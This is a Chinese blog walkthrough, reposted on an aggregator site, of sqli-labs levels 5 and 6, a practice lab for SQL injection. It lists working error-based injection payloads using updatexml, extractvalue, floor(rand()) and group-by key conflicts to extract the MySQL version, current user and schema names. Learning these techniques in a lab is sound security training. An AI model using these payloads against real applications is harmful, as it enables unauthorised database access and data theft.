sqli-labs第五,六题

其他 2020-06-18 22:54:51 阅读次数: 0

第五题

 1.根据提示,输入id参数

 在正确id范围内,改变id页面相同

 2.老规矩,单引号伺候

单引号触发错误

猜测sql语句为:"SELECT * FROM table_name WHERE id='$id' LIMIT 0,1"

3.注入布尔表达式,观察页面变化

注入永假式页面无返回值,确认存在注入漏洞

4.因为页面并不直接显示查询结果,所以选择报错注入或布尔盲注进行攻击(延时注入亦可),这里使用报错注入

(1)通过updatexml函数,执行SQL语句

  ?id=1' and updatexml(1,(concat(0x7c,(select @@version))),1) --+

  爆出数据库版本信息

   查询元数据

  ?id=1' and updatexml(1,concat(0x7c,(select group_concat(schema_name) from information_schema.schemata)),1)--+

  updatexml返回的字符串长度有限 32字节

  可以使用LIMIT对元数据进行枚举

  ?id=1' and updatexml(1,concat(0x7c,(select schema_name from information_schema.schemata LIMIT 0,1)),1)--+

  。。。。。。

(2)通过extractvalue函数,执行SQL语句

  用法与updatexml类似,返回字符串长度也同样只有32字节

  ?id=1' and extractvalue(1,concat(0x7c,(select schema_name from information_schema.schemata LIMIT 0,1)))--+

 (3)通过floor函数,执行SQL语句

  ?id=1' union select * from (select NULL, count(*),concat(floor(rand(0)*2),(select user())) a from information_schema.tables group by a)b--+

 (4)通过group by重复键冲突,进行报错注入

  ?id=1' union select NULL,concat(left(rand(),3),'^',(select version()),'^')a,count(*) from information_schema.tables group by a --+

第六题

与第五题类似将单引号换为双引号即可。

猜你喜欢

转载自www.cnblogs.com/a-qi/p/13160518.html
今日推荐
wlnmp 一键安装包更新 240522
ChatGPT 严重宕机,结果被造谣“遭遇俄罗斯黑客入侵”
Linus “吃狗粮”最积极!
开源日报 | Winamp播放器即将开源;生成式AI之战升级第二轮;Linus“吃狗粮”最积极;AI进入泡沫前期;吴泳铭为阿里云带来了什么?
NetBSD 禁止提交由 AI 生成的代码
Apache Doris 2.0.10 版本正式发布!
开源日报 | 大模型开战;大模型独角兽被曝卖身;周鸿祎建议谷歌开源所有产品;最大开源AI社区提供1000万美元共享GPU
周排行
mongodb 下载与安装与初步使用
20190530
iOS录制回放神器AutoTouch使用介绍
同心圆 猜数字游戏
mamp pro安装redis扩展 各个 步骤截图
windows10下安装docker报错:error during connect
跨域授权 Federated Identity Pattern
js时间比较大小
pandas to_csv()使用方法
从JDK源码角度看Byte
每日归档
更多
2024-05-22(41)
2024-05-21(8)
2024-05-20(36)
2024-05-19(0)
2024-05-18(4)
2024-05-17(34)
2024-05-16(6)
2024-05-15(24)
2024-05-14(0)
2024-05-13(18)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022